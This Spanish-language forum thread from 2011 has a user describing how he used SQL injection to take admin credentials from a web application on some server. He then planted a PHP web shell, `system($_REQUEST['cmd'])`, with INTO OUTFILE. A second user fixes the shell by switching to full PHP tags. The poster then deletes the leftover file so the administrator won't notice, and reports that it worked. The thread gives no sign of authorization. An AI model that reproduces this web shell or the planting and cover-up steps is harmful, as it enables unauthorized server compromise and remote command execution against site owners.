Shell php a medias

Iniciado por 4rkn63l, 5 Marzo 2011, 18:35 PM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

4rkn63l

5 Marzo 2011, 18:35 PM
Bueno, pues despues de venir testeando SQL Injection con una aplicacion web en X servidor, consegui sacar alguna info, el usuario y contraseña del admin, entre otras cosas.Sin embargo hay algo que no he podido testear y es una shell php, dentro del directorio web encontre un sub directorio donde tengo permiso de escritura, mediante un INTO OUTFILE escribi el codigo de la shell
Código [Seleccionar]
<? system($_REQUEST['cmd']); ?>, pero al intentar ejecutarlo no pasa absolutamente nada, y es obvio q no pase nada por que si veo el codigo fuente de archivo se muestra el codigo php, como si php no lo estuviese parseando.¿A que se debe esto?¿Es que acaso no es suficiente con que el archivo este en algun subdirectorio del arbol web?

~ Yoya ~

#1
5 Marzo 2011, 20:49 PM
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

4rkn63l

#2
5 Marzo 2011, 21:55 PM
Gracias ~ Yoya ~, bien explicado el uso de INTO OUTFILE.

Pero ¿A que se debera que no se ejecuta el codigo php?, es decir supongamos que el problema esta en el uso de la funcion system o por el tipo de metodo usado ($_REQUEST). Aun asi el codigo php no se deberia mostrar en el codigo fuente.

~ Yoya ~

#3
5 Marzo 2011, 22:32 PM
Eso se debe a la directiva short_open_tag, trata de subir el archivo de nuevo pero asi:

Código (php) [Seleccionar]
<?php system($_REQUEST['cmd']); ?>
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

4rkn63l

#4
5 Marzo 2011, 22:55 PM
si yo tambien tenia la duda que podia ser eso, el uso de las tags. Ahora veamos, tengo que subir otro archivo .php al servidor ya que INTO OUTFILE no sobreescribe ficheros, por lo que estarian alojados 2 archivos "raros" en ese subdirectorio y no quiero llamar la atencion del admin hasta terminar mis practicas xD.

Pero bueno, me voy a arriesgar a crear otro archivo esperando que el segundo funcione y a traves de la shell intentar borrar el primer archivo.....se puede no??  :xD

~ Yoya ~

#5
5 Marzo 2011, 22:57 PM
si claro xD
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

4rkn63l

#6
6 Marzo 2011, 00:09 AM
Bingo!!  ::)

Muchas gracias ~ Yoya ~ por tu ayuda,la verdad no pensé que el modo de las etiquetas pudiera afectar, leí una info donde efectivamente dice que en php5 no vienen habilitadas las etiquetas cortas que es lo que me hacias mencion anteriormente...pero bueno de los errores se aprende.

Ademas pude borrar el primer archivo sin problemas jejeje.

not-all0w3d

#7
21 Marzo 2011, 22:18 PM
¿Por qué no sólo usaste una backdoor sencilla?..
En fin el problema está solucionado, sólo era una sugerencia.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario